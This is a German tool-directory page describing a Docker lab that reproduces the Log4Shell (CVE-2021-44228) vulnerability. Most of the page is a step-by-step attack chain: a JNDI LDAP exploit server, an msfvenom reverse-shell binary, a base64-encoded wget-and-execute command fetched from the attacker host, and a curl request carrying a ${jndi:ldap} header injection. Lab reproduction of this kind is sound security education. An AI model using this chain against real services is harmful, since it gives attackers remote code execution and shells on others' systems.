Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Log4Shell-CVE-2021-44228-ENV — Log4Shell Docker Env | Kitploit
Tools/GitHubGitHub/ycdxsb/log4shell-cve-2021-44228-env
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubycdxsb/log4shell-cve-2021-44228-env

Log4Shell-CVE-2021-44228-ENV

Log4Shell Docker Env

Repository anzeigen
414vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Log4Shell-Reproduktionsumgebung

Beispielbeschreibung

IP des Zielrechners: 47.47.47.47

IP des Angreiferrechners: 48.48.48.48

Docker mit verwundbarem Dienst auf dem Zielrechner ausführen

  • Docker-Image mit DockerFile bauen und ausführen:
root@kitploit:~
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln

Angriffs-Docker auf dem Angreiferrechner ausführen

  • Docker-Image mit DockerFile bauen und ausführen
root@kitploit:~
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack

Vorbereitung der Angreifer-Umgebung

Befehle in drei verschiedenen Shells ausführen; die Shells müssen aktiv bleiben.

  • JDNI-Server auf dem Angreifer starten
root@kitploit:~
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
  • HTTP-Server auf dem Angreifer starten
root@kitploit:~
docker exec -it attack /bin/bash
python3 -m http.server 9999
  • nc-Portüberwachung auf dem Angreifer starten
root@kitploit:~
docker exec -it attack /bin/bash
nc -lvvp 9000

Angriff vom Angreiferrechner ausführen

Befehle in derselben Shell ausführen

root@kitploit:~
docker exec -it attack /bin/bash
  • Reverse-Shell-Datei auf dem Angreifer vorbereiten
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
  • Payload auf dem Angreifer vorbereiten
root@kitploit:~
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
  • Angriffs-Payload senden
root@kitploit:~
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'

Befehlserzeugung

root@kitploit:~
python3 command_gen.py vuln_ip attack_ip

Videodemonstration

Video

Referenzen

  • https://github.com/christophetd/log4shell-vulnerable-app
  • https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
Tool herunterladen